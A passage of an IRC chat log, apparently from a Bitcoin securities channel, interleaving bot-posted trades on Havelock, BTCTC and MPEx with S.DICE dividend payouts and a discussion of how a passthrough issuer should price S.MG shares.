19 04:03:07 [HAVELOCK] [SMG] 98 @ 0.00057998 = 0.0568 BTC [+] Jul 19 04:03:14 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jul 19 04:04:11 [HAVELOCK] [SMG] 900 @ 0.00057998 = 0.522 BTC [+] Jul 19 04:04:31 [HAVELOCK] [AM100] 1 @ 0.046 BTC [+] Jul 19 04:04:42 [BTCTC] [LTC-ATF.B2] 5 @ 0.010022 = 0.0501 BTC [-] Jul 19 04:04:44 [BTCTC] [LTC-ATF.B2] 25 @ 0.010021 = 0.2505 BTC [-] Jul 19 04:04:45 [BTCTC] [LTC-ATF.B2] 14 @ 0.010011 = 0.1402 BTC [-] Jul 19 04:04:47 [BTCTC] [LTC-ATF.B2] 7 @ 0.01001 = 0.0701 BTC [-] Jul 19 04:04:49 [BTCTC] [LTC-ATF.B2] 449 @ 0.01 = 4.49 BTC [-] Jul 19 04:06:29 [BTCTC] [AMC-PT] 438 @ 0.0025 = 1.095 BTC [+] Jul 19 04:09:14 [BTCTC] [AMC-PT] 8100 @ 0.0025 = 20.25 BTC [+] Jul 19 04:09:30 [BTCTC] [ASICMINER-PT] 1 @ 4.501 BTC [-] Jul 19 04:09:32 [BTCTC] [ASICMINER-PT] 3 @ 4.500002 = 13.5 BTC [-] Jul 19 04:09:34 [BTCTC] [ASICMINER-PT] 1 @ 4.500001 BTC [-] Jul 19 04:10:06 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 04:10:28 [BTCTC] [BASIC-MINING] 1 @ 0.651 BTC [-] Jul 19 04:10:30 [BTCTC] [BASIC-MINING] 1 @ 0.650001 BTC [-] Jul 19 04:13:22 [HAVELOCK] [SMG] 1163 @ 0.00057997 = 0.6745 BTC [-] Jul 19 04:13:24 [HAVELOCK] [SMG] 2000 @ 0.00057998 = 1.16 BTC [+] Jul 19 04:13:27 [HAVELOCK] [SMG] 4997 @ 0.00058 = 2.8983 BTC [+] Jul 19 04:13:29 [HAVELOCK] [SMG] 1000 @ 0.00065 = 0.65 BTC [+] Jul 19 04:13:31 [HAVELOCK] [SMG] 1000 @ 0.00069 = 0.69 BTC [+] Jul 19 04:13:33 [HAVELOCK] [SMG] 211 @ 0.0007 = 0.1477 BTC [+] Jul 19 04:13:35 [HAVELOCK] [SMG] 5000 @ 0.00075 = 3.75 BTC [+] Jul 19 04:13:37 [HAVELOCK] [SMG] 10000 @ 0.0008 = 8 BTC [+] Jul 19 04:13:39 [HAVELOCK] [SMG] 1000 @ 0.0008 = 0.8 BTC [+] Jul 19 04:13:49 influx of trolling lately Jul 19 04:14:19 peoples lack of ability to identify it is scary Jul 19 04:15:11 [BTCTC] [TAT.ASICMINER] 14 @ 0.043126 = 0.6038 BTC [-] Jul 19 04:15:25 [BTCTC] [ASICMINER-PT] 1 @ 4.500001 BTC [-] Jul 19 04:15:27 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 19 04:15:39 [BTCTC] [TAT.ASICMINER] 26 @ 0.043125 = 1.1213 BTC [-] Jul 19 04:17:38 [BTCTC] [AMC-PT] 688 @ 0.0025 = 1.72 BTC [+] Jul 19 04:19:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.04327 BTC [+] Jul 19 04:19:32 [BTCTC] [AMC-PT] 1180 @ 0.0025 = 2.95 BTC [+] Jul 19 04:20:43 dub i was kinda enjoying it Jul 19 04:20:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.04399 = 0.4399 BTC [+] Jul 19 04:21:29 [HAVELOCK] [SMG] 100 @ 0.00079 = 0.079 BTC [-] Jul 19 04:21:31 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 04:21:45 [HAVELOCK] [AM100] 3 @ 0.045999 = 0.138 BTC [-] Jul 19 04:22:38 [HAVELOCK] [SMG] 4900 @ 0.00079 = 3.871 BTC [-] Jul 19 04:22:48 [HAVELOCK] [SMG] 100 @ 0.0008 = 0.08 BTC [+] Jul 19 04:23:36 [HAVELOCK] [AM100] 3 @ 0.0456 = 0.1368 BTC [-] Jul 19 04:23:53 [BTCTC] [AMC-PT] 801 @ 0.0025 = 2.0025 BTC [+] Jul 19 04:24:55 [HAVELOCK] [SMG] 25 @ 0.0008 = 0.02 BTC [+] Jul 19 04:26:06 !t m s.mg Jul 19 04:26:07 [MPEX:S.MG] 1D: 0.00018101 / 0.0002294 / 0.0004 (320732 shares, 73.58 BTC), 7D: 0.00013 / 0.00020896 / 0.0004 (527084 shares, 110.14 BTC), 30D: 0.0001 / 0.00019614 / 0.0004 (635378 shares, 124.63 BTC) Jul 19 04:26:37 [HAVELOCK] [HIM] 2 @ 0.268 = 0.536 BTC [+] Jul 19 04:26:37 is the havelock one 1:1? Jul 19 04:27:15 yes Jul 19 04:27:26 BTC IS CRASHING RUN FOR YOUR LIVES Jul 19 04:27:35 oh uh..sorry thought this was btc-e Jul 19 04:27:43 wrong window Jul 19 04:28:15 ;;ticker Jul 19 04:28:15 MtGox BTCUSD ticker | Best bid: 89.59001, Best ask: 89.99996, Bid-ask spread: 0.40995, Last trade: 89.99994, 24 hour volume: 59171.42632789, 24 hour low: 86.20000, 24 hour high: 98.28067, 24 hour vwap: 90.88977 Jul 19 04:28:56 ThickAsThieves so why aren't you putting more sjhares on the market ? Jul 19 04:29:00 this 4x stuff is unseemly. Jul 19 04:29:07 makes the entire exchange look particularly failboat. Jul 19 04:30:38 which security do you mean? SMG? Jul 19 04:31:02 yes. Jul 19 04:31:54 I think he's trying to ipo manually Jul 19 04:32:05 i haven't seen any shares listed under ipos Jul 19 04:32:36 He's not really IPOing, it's a passthrough. Jul 19 04:32:38 publio, its not an IPO Jul 19 04:32:49 So he'll keep putting shares for sale as much as there is demand Jul 19 04:32:50 the passthru shares get listed directly on the open market as they are added to the exchange Jul 19 04:33:14 lol Jul 19 04:33:17 yes what namworld and i said :) Jul 19 04:33:33 Namworld: are you going to add a S.MG-PT to btct? Jul 19 04:33:35 i wonder why exactly is btc so fucking opaque ? Jul 19 04:33:47 because btc has endless morons Jul 19 04:33:51 it must be a mental deffect of people. everything's online. nobody reads, noboduy knows anything. Jul 19 04:34:10 spealk of the devil Jul 19 04:34:44 [MPEX] [S.DICE] [PAID] 8,75 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:34:52 boosh Jul 19 04:35:05 that's weird. Jul 19 04:35:07 8,75? Jul 19 04:35:08 ?? Jul 19 04:35:30 actually it was 8.75k i see. Jul 19 04:35:37 kakobrekla is assbot sick ? Jul 19 04:36:03 still not enough tho Jul 19 04:36:05 [BTCTC] [S.MPOE-PT] 1 @ 0.000803 BTC [+] Jul 19 04:36:34 Array Jul 19 04:36:34 ( Jul 19 04:36:34 [type] => 21 Jul 19 04:36:34 [symbol] => S.DICE Jul 19 04:36:34 [price] => 875000000000 Jul 19 04:36:35 [amount] => 50000000 Jul 19 04:36:35 ) Jul 19 04:36:50 so not 8,75 Jul 19 04:37:05 i got 0.000175 BTC / share in my account Jul 19 04:37:13 dunno wtf stupid bot who made you anyway Jul 19 04:37:18 lolk Jul 19 04:37:29 should be .0035? Jul 19 04:37:37 dub i think the plan is to do like 20 Jul 19 04:37:45 [MPEX] [S.DICE] [PAID] 8,75 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:37:55 Didn't Eric say it would be getting paid out in 20 payments or something? Jul 19 04:38:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.043126 = 2.1563 BTC [-] Jul 19 04:38:17 8750.00000000 btc that is. Jul 19 04:38:21 [BTCTC] [TAT.ASICMINER] 83 @ 0.043125 = 3.5794 BTC [-] Jul 19 04:38:23 [BTCTC] [TAT.ASICMINER] 30 @ 0.043004 = 1.2901 BTC [-] Jul 19 04:38:25 [BTCTC] [TAT.ASICMINER] 17 @ 0.043003 = 0.7311 BTC [-] Jul 19 04:38:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.043003 = 0.344 BTC [-] Jul 19 04:38:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.043002 = 0.473 BTC [-] Jul 19 04:38:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 19 04:39:00 quick fix the bot before the next batch :p Jul 19 04:39:12 fix it during the next batch so we get fireworks Jul 19 04:39:58 [MPEX] [S.DICE] [PAID] 8,75 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:40:01 well, if 20 payments come at 17500, that is indeed, the correct amount. Jul 19 04:40:20 whats the reasoning Jul 19 04:40:31 why is he splitting it up instead of making one payment? Jul 19 04:40:34 taking one last shit in the blockchain? Jul 19 04:40:53 before handing the toilet over to its new owner Jul 19 04:41:10 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:41:22 kakobrekla, well done! Jul 19 04:41:24 but no fireworks ? Jul 19 04:41:45 PEW PEW PEW *FIREWORKS* PEW Jul 19 04:41:52 lol Jul 19 04:41:54 ahahaha Jul 19 04:41:57 " taking one last shit in the blockchain?" hahahahaha Jul 19 04:41:57 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 19 04:41:58 [HAVELOCK] [SMG] 175 @ 0.0007 = 0.1225 BTC [-] Jul 19 04:42:20 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:42:46 mircea_popescu, should i wait to withdraw it all at once? or shall i withdraw it from mpex in 20 batches too? :p Jul 19 04:42:52 maybe ill do it in 200 batches, just to be safe Jul 19 04:43:00 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:43:05 [BTCTC] [LTC-ATF.B2] 1 @ 0.010391 BTC [+] Jul 19 04:43:07 maybe i'll do each batch in 48 hours Jul 19 04:43:17 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 04:43:21 hehe Jul 19 04:43:39 ltc-atf.b2 ? wjhat's that, a new fighter-bomber ? Jul 19 04:43:54 is a "bond" from deprived Jul 19 04:44:02 [BTCTC] [ASICMINER-PT] 1 @ 4.615 BTC [+] Jul 19 04:44:04 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:44:04 ic Jul 19 04:44:05 topace_: do it in 2000, as a last homage to sdice Jul 19 04:44:21 one of those daily payout no payoff date bonds Jul 19 04:44:36 meh. Jul 19 04:44:43 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:44:59 [BTCTC] [S.DICE-PT] 10 @ 0.003498 = 0.035 BTC [-] Jul 19 04:45:07 dont stop assbot, dont stop Jul 19 04:45:10 using AN0 it would have infinite liabilities Jul 19 04:45:21 mircea_popescu: Litecoin-Advanced Task Force. Bravo 2 attack squad Jul 19 04:45:28 lol Jul 19 04:45:32 lol Jul 19 04:45:37 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:45:43 coming rapid fire now Jul 19 04:45:52 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:45:53 better duck quick! Jul 19 04:46:29 is that 10 ? Jul 19 04:46:33 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:46:53 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:46:56 tell dooglus to up the max bets Jul 19 04:46:59 [BTCTC] [AMC-PT] 6426 @ 0.0025 = 16.065 BTC [+] Jul 19 04:47:04 !t m s.mpoe Jul 19 04:47:05 [MPEX:S.MPOE] 1D: 0.00087851 / 0.00088663 / 0.00089397 (585653 shares, 519.26 BTC), 7D: 0.00077252 / 0.00086466 / 0.00097228 (2617307 shares, 2,263.09 BTC), 30D: 0.00067092 / 0.00077939 / 0.00097228 (60246973 shares, 46,956.24 BTC) Jul 19 04:47:15 [BTCTC] [AMC-PT] 1839 @ 0.0025 = 4.5975 BTC [+] Jul 19 04:47:17 i wonder where all the dough will end up. Jul 19 04:47:32 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:47:46 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:48:15 [HAVELOCK] [AM100] 50 @ 0.0455 = 2.275 BTC [-] Jul 19 04:48:17 [HAVELOCK] [AM100] 21 @ 0.0455 = 0.9555 BTC [-] Jul 19 04:48:23 [MPEX] [S.DICE] [PAID] 8,750.00000000 BTC to 50`000`000 shares, 17500 satoshi per share Jul 19 04:48:25 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 19 04:49:29 so that's like 15 ? Jul 19 04:49:54 yeah Jul 19 04:50:09 [HAVELOCK] [AM100] 30 @ 0.0455 = 1.365 BTC [-] Jul 19 04:50:10 yup 15 Jul 19 04:50:15 true sdice style indeed Jul 19 04:50:31 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 04:50:39 Every bet is a winner! Look at all that money! Jul 19 04:50:44 lol srsly. Jul 19 04:50:54 boss killed, loot springs Jul 19 04:51:23 that was a 40-man raid boss Jul 19 04:52:15 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 04:52:47 ah, i found where the money will end up, from the just-dice trollbox: Dabs Insane Gambling Security = 1% per day, 7% per week. NOT A PONZI. it's a GAMBLE! Jul 19 04:53:15 pigeons is there a trollbox in this bitcointernet that you don't keep tabs on ? Jul 19 04:53:15 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 04:53:40 hmm Jul 19 04:53:40 [BTCTC] [AMC-PT] 473 @ 0.0025 = 1.1825 BTC [+] Jul 19 04:54:06 lol ok Jul 19 04:54:10 time's up. Jul 19 04:54:31 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 19 04:54:34 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 04:54:45 Erhm... Jul 19 04:54:54 last 5 are gonna be 10 at 1/2 ? Jul 19 04:55:03 or we're getting exponentially smaller... Jul 19 04:55:13 this is gonna be 100000000 payouts actually Jul 19 04:55:25 lol Jul 19 04:55:40 hahahaha Jul 19 04:55:43 ANNOUNCEMENT - S.MG shares are now available via passthrough BitFunder: https://bitfunder.com/asset/TAT.MINIGAME Jul 19 04:56:06 jezuz. Jul 19 04:56:07 [HAVELOCK] [SMG] 100 @ 0.0005 = 0.05 BTC [-] Jul 19 04:56:15 [HAVELOCK] [SMG] 3 @ 0.00045 = 0.0014 BTC [-] Jul 19 04:56:18 [HAVELOCK] [SMG] 5 @ 0.0004 = 0.002 BTC [-] Jul 19 04:56:49 TAT are you going to arbitrage the shares to keep them in line with the mpex ones? Jul 19 04:56:53 ThickAsThieves: hostile takeover? TAT's MINIGAME now? xD Jul 19 04:56:54 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 04:57:20 our mustangs are selling like S.MG passthroughs Jul 19 04:57:22 I am trying to post more reasonable prices, yes Jul 19 04:57:22 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 19 04:57:27 [BTCTC] [AMC-PT] 5100 @ 0.0025 = 12.75 BTC [+] Jul 19 04:57:36 they get eaten up too, and i have to be careful with deposit delays Jul 19 04:57:39 to buy more Jul 19 04:57:45 asks are thin Jul 19 04:58:05 !t m s.mg Jul 19 04:58:06 [MPEX:S.MG] 1D: 0.00018101 / 0.0002294 / 0.0004 (320732 shares, 73.58 BTC), 7D: 0.00013 / 0.00020896 / 0.0004 (527084 shares, 110.14 BTC), 30D: 0.0001 / 0.00019614 / 0.0004 (635378 shares, 124.63 BTC) Jul 19 04:58:16 No, TAT is just going to sell them for 10x the MPEx price because people are just crazy like that. Jul 19 04:58:16 [HAVELOCK] [SMG] 930 @ 0.0004 = 0.372 BTC [-] Jul 19 04:58:18 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 04:58:24 [BTCTC] [TAT.ASICMINER] 11 @ 0.043796 = 0.4818 BTC [+] Jul 19 04:58:25 [BTCTC] [ASICMINER-PT] 1 @ 4.599999 BTC [-] Jul 19 04:58:51 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 19 04:59:01 [HAVELOCK] [SMG] 10 @ 0.0004 = 0.004 BTC [-] Jul 19 04:59:08 not sure where to draw the line between being a good steward and leaving money on the table Jul 19 04:59:17 open to your comments Jul 19 04:59:21 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 04:59:24 5%? Jul 19 04:59:36 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 04:59:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.043796 = 0.1752 BTC [+] Jul 19 04:59:45 why 5%? Jul 19 04:59:45 something like that. Jul 19 04:59:48 your 5% seem fair Jul 19 04:59:54 [HAVELOCK] [AM100] 75 @ 0.0455 = 3.4125 BTC [-] Jul 19 05:00:01 i get mor ethan 5% arbing AM almost every day Jul 19 05:00:18 [HAVELOCK] [SMG] 5 @ 0.00035 = 0.0018 BTC [-] Jul 19 05:00:20 [HAVELOCK] [SMG] 5000 @ 0.0003 = 1.5 BTC [-] Jul 19 05:00:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.043795 = 2.1898 BTC [-] Jul 19 05:00:25 [BTCTC] [TAT.ASICMINER] 19 @ 0.04399 = 0.8358 BTC [+] Jul 19 05:00:25 for 5% issue as many as they'll take, you can buy up later if necessary for some reason Jul 19 05:00:29 tat, do you actually own the shares you passthrough or do you sometimes create some out of thin air? ;) Jul 19 05:00:47 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 05:00:50 this isnt mt gox Jul 19 05:00:52 and why are you starting selling shares at .25 mB instead of closer to .18 mB current MPEx price? Jul 19 05:01:00 I own more tan have been sold, but I am trying to stay stocked Jul 19 05:01:01 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 05:01:37 [BTCTC] [TAT.ASICMINER] 19 @ 0.04399 = 0.8358 BTC [+] Jul 19 05:01:40 jurov can verify if you are truly concerned Jul 19 05:01:47 another 15 at 4,375 now? Jul 19 05:01:56 [MPEX] [S.DICE] [PAID] 4,375.00000000 BTC to 50`000`000 shares, 8750 satoshi per share Jul 19 05:01:57 i'm not, just asking out of curiosity Jul 19 05:02:30 yeah the idea with pts is to hold the shares. Jul 19 05:03:04 i thought this was bitcoin? Jul 19 05:03:11 ofc Jul 19 05:03:30 how do you factor scarcity into current value? Jul 19 05:03:42 if i eat up the SMG on mpex, then what? Jul 19 05:03:47 ThickAsThieves the moment you're factoring in "Scarcity" you've fucked up. Jul 19 05:03:56 markets exist to allocate capital not to cause friction Jul 19 05:04:17 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 05:05:24 [MPEX] [S.DICE] [PAID] 2,187.50000000 BTC to 50`000`000 shares, 4375 satoshi per share Jul 19 05:05:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.04399 = 0.088 BTC [+] Jul 19 05:05:35 jesus Jul 19 05:05:37 smaller again Jul 19 05:05:43 how do markets stop people from overpaying and how does that relate to underselling? Jul 19 05:06:44 [MPEX] [S.DICE] [PAID] 2,187.50000000 BTC to 50`000`000 shares, 4375 satoshi per share Jul 19 05:07:21 ThickAsThieves this is all very primitive, but let's go into it. Jul 19 05:07:32 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 05:07:34 that's a difficult question Jul 19 05:07:36 [MPEX] [S.DICE] [PAID] 2,187.50000000 BTC to 50`000`000 shares, 4375 satoshi per share Jul 19 05:07:38 if you sell for twice the price basically you've fancied yourself a sort of blessed prince of bitcoin who taxes 50% of capital Jul 19 05:07:48 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 05:07:52 [BTCTC] [TAT.ASICMINER] 31 @ 0.043201 = 1.3392 BTC [-] Jul 19 05:07:58 this position is unwarranted, and an inclination to assume it marks you as one of those that have to be kept away from it all. Jul 19 05:08:13 obviously the market will route around this sort of nonsense. Jul 19 05:08:14 [MPEX] [S.DICE] [PAID] 2,187.50000000 BTC to 50`000`000 shares, 4375 satoshi per share Jul 19 05:08:14 one last... why is it not one payment Jul 19 05:08:26 crack rocks Jul 19 05:08:26 at last Jul 19 05:08:34 350'000 satoshis paid per share Jul 19 05:08:44 what if SMG is underpriced on MPEX? Jul 19 05:08:47 What a show off... Jul 19 05:08:49 rather than try to make .5 btc as 50% of a bitcoin, the idea of economy, growth and generally progress is to make virtually nothing at all over cvasi infinite volume Jul 19 05:09:13 infinite volume is not possible here Jul 19 05:09:31 you are aware about what volume it traded on ipo right ? Jul 19 05:09:58 options are simple : broaden the base or try and skim as much as possible. Jul 19 05:10:14 the later is stupid. Jul 19 05:11:12 i'm not arguing against your logic as a position, but I do want to ask more questions Jul 19 05:11:16 so ask Jul 19 05:11:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.043989 = 2.1995 BTC [+] Jul 19 05:11:33 if i were not issuer, Jul 19 05:11:40 what i would do in this case Jul 19 05:11:50 would be to buy up all of the only 5% marked up shares Jul 19 05:11:55 as they are in short supply Jul 19 05:12:01 even if temporsarily Jul 19 05:12:05 and the resell them Jul 19 05:12:07 flip em Jul 19 05:12:11 at higher prices Jul 19 05:12:22 this behavior is well exhibited Jul 19 05:12:25 on havelock Jul 19 05:12:35 basically my cache of shares Jul 19 05:12:39 is to shallow Jul 19 05:12:42 to stave this off Jul 19 05:12:58 wait for bids to build and sell into them Jul 19 05:13:04 but the issuer can just go buy more shares from MPEx and undercut your flip, then you are stuck with overpriced shares Jul 19 05:13:10 else you are doing an eric Jul 19 05:13:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.04399 = 0.088 BTC [+] Jul 19 05:13:44 why is your cache shallow ? Jul 19 05:13:45 just buy more. Jul 19 05:14:24 ok, Jul 19 05:14:32 [BTCTC] [DMS.SELLING] 10 @ 0.023 = 0.23 BTC [+] Jul 19 05:14:32 also what happens when the ask book empties Jul 19 05:14:36 on mpex Jul 19 05:14:49 [BTCTC] [S.DICE-PT] 1 @ 0.003498 BTC [-] Jul 19 05:14:50 [BTCTC] [S.DICE-PT] 9 @ 0.003333 = 0.03 BTC [-] Jul 19 05:14:51 [MPEX] [S.DICE] [PAID] 41.96250000 BTC to 50`000`000 shares, 83 satoshi per share Jul 19 05:14:52 [BTCTC] [S.DICE-PT] 40 @ 0.00333 = 0.1332 BTC [-] Jul 19 05:15:04 even now it goes from .000225 to .0004 Jul 19 05:15:11 then nothing Jul 19 05:15:15 If you raise the MPEx price enough, then people will add asks Jul 19 05:15:32 i assume Jul 19 05:15:34 i'm pretty sure. Jul 19 05:15:34 isn't that how these exchanges work? Jul 19 05:15:36 but at what price? Jul 19 05:15:56 ThickAsThieves there's millions of shares in warrants at 1.x ish Jul 19 05:16:02 put up bids on mpex up to where people are buying from you on the other exchanges Jul 19 05:16:03 [MPEX] [S.MG] 3350 @ 0.000225 = 0.7538 BTC [+] Jul 19 05:16:36 selling into bids has been pretty rare so far Jul 19 05:16:46 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 19 05:16:58 that just means the bids are not high enough to attract the sellers Jul 19 05:17:13 which means we dont know what the "fair" price is at all Jul 19 05:17:26 so we find it. halve the interval. Jul 19 05:17:47 your job isn't to sit and worry about what if these are the last five shares and we gotta make them last the winter Jul 19 05:17:52 [BTCTC] [AMC-PT] 19250 @ 0.0025 = 48.125 BTC [+] Jul 19 05:17:57 hehe Jul 19 05:17:59 and your job isn't to sit and bohoo over the misteries of price Jul 19 05:18:10 your job is to provide liquidity both ways and close the zero-infinity window asap. Jul 19 05:18:10 okay Jul 19 05:18:35 that's what you do. then if you do that the exchange you're active on grows and bitcoin generally grows too Jul 19 05:18:47 [BTCTC] [AMC-PT] 325 @ 0.0025 = 0.8125 BTC [+] Jul 19 05:18:55 how do you determine what is the "correct" markup Jul 19 05:18:58 so thats the SDICE done Jul 19 05:19:00 but what was : Jul 19 05:19:02 [MPEX] [S.DICE] [PAID] 41.96250000 BTC to 50`000`000 shares, 83 satoshi per share Jul 19 05:19:15 topace_ i suspect it's some refund of something or the other. Jul 19 05:19:17 profits from july? Jul 19 05:19:18 your hypothesis is that narrowing the bid/ask spread will drastically increase volume? Jul 19 05:19:18 the dev fund Jul 19 05:19:47 5% is arbitrary, correct? Jul 19 05:19:57 [BTCTC] [ASICMINER-PT] 1 @ 4.582999 BTC [-] Jul 19 05:20:01 [BTCTC] [ASICMINER-PT] 1 @ 4.586 BTC [+] Jul 19 05:20:02 ThickAsThieves it's just guesswork. Jul 19 05:20:03 [BTCTC] [ASICMINER-PT] 3 @ 4.589996 = 13.77 BTC [+] Jul 19 05:20:05 [BTCTC] [ASICMINER-PT] 1 @ 4.59 BTC [+] Jul 19 05:20:15 mike_c narrowing the bid/ask spread is the fucking point of life on earth. Jul 19 05:20:17 that's what we do. Jul 19 05:20:24 if we don't do that, we end up like the soviets. Jul 19 05:20:31 [BTCTC] [AMC-PT] 3990 @ 0.0025 = 9.975 BTC [+] Jul 19 05:20:33 which is to say very poor and very hungry and very defeated. Jul 19 05:20:38 i agree, but i'm not sure about the leap to it drastically increasing volume. although it certainly seems to have for mpoe Jul 19 05:21:03 mircea_popescu: if we don't do that, we end up like the soviets. lol Jul 19 05:21:07 mike_c there wasn't a causality there. the idea is to make a litte over more volume rather than trying to optimize your rake on .x btc Jul 19 05:21:16 there is such a thing as premature optimization. bitcoin ain't there yet. Jul 19 05:21:28 [BTCTC] [BFMINES] 325 @ 0.003999 = 1.2997 BTC [+] Jul 19 05:21:29 [BTCTC] [ASICMINER-PT] 1 @ 4.515 BTC [-] Jul 19 05:22:06 [BTCTC] [TAT.ASICMINER] 27 @ 0.04399 = 1.1877 BTC [+] Jul 19 05:22:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.044 = 0.22 BTC [+] Jul 19 05:22:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [+] Jul 19 05:22:56 [BTCTC] [ASICMINER-PT] 1 @ 4.587 BTC [+] Jul 19 05:23:14 I guess part of my uncertainty here is that I've really only sold like 60k shares here, and I want to use each sale to buy at a price over again that is less than that sale, there are only 200k shares in asks on the books at mpex Jul 19 05:23:35 let's take this other example : i play eve. eve has a gazillion weird items. noobs want to know what to sell or buy for Jul 19 05:23:43 so yeah, selling at .0009 is overkill Jul 19 05:23:46 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 05:23:49 what i always say is, go on the market, see what's lowest ask and highest bid and put right in the middle. Jul 19 05:23:50 but is .0004 overkill? Jul 19 05:23:57 [BTCTC] [AMC-PT] 1370 @ 0.0025 = 3.425 BTC [+] Jul 19 05:23:58 if that is the price of half the asks left? Jul 19 05:23:58 ThickAsThieves - good steward unless you plan to split town in a month. the long con is where the money is at. Jul 19 05:24:03 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 05:24:39 mircea_popescu, withdrawal requested for havelock pt sdice payouts Jul 19 05:24:48 so you suggest i sell the PT at les than the current ask on mpex? Jul 19 05:24:51 please process when convenient Jul 19 05:25:00 that doesnt seem right Jul 19 05:25:55 lol how do i suggest that Jul 19 05:26:14 well you said sell or buy for Jul 19 05:26:23 i could see posting bids at halfway Jul 19 05:26:24 sure Jul 19 05:26:38 maybe you can lower the price down to cost Jul 19 05:26:41 [BTCTC] [AMC-PT] 20000 @ 0.0025 = 50 BTC [+] Jul 19 05:26:45 [BTCTC] [GSDPT] 1 @ 0.00333 BTC [-] Jul 19 05:26:45 TAT, if you just sold some for above the MPEX ask price, then go buy those shares and sell them to the PT Jul 19 05:26:45 to force a trade Jul 19 05:27:03 i certainly wont sell for cost Jul 19 05:27:16 there ar eno mgmt fees to be had in the near-term Jul 19 05:27:23 TAT, if you just sold some for above the MPEX ask price, then go buy those shares and sell them to the PT << Jul 19 05:27:28 not sure what's so confusing about that. Jul 19 05:27:34 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 05:27:49 i dont know if those shares will be there by the time bu coin clears Jul 19 05:27:50 my* Jul 19 05:28:09 then hurry and get some coin onto MPEx Jul 19 05:28:28 this is where mp tells me to get a real cab Jul 19 05:28:33 and stop pushing a cart Jul 19 05:28:45 i'm waiting on jurov essentially Jul 19 05:29:24 [HAVELOCK] [SMG] 70 @ 0.0003 = 0.021 BTC [-] Jul 19 05:29:26 as i use coinbr Jul 19 05:29:29 not mpex Jul 19 05:29:49 maybe i'll use all these inflated sales to pony up Jul 19 05:29:57 If you are running a PT, doesn't it make more sense to work directly with MPEx? Jul 19 05:30:12 i didnt think it would have mentionable volume Jul 19 05:30:18 i was wrong Jul 19 05:30:23 [BTCTC] [AMC-PT] 1879 @ 0.0025 = 4.6975 BTC [+] Jul 19 05:30:30 [BTCTC] [ASICMINER-PT] 1 @ 4.587 BTC [+] Jul 19 05:30:32 [BTCTC] [ASICMINER-PT] 2 @ 4.59 = 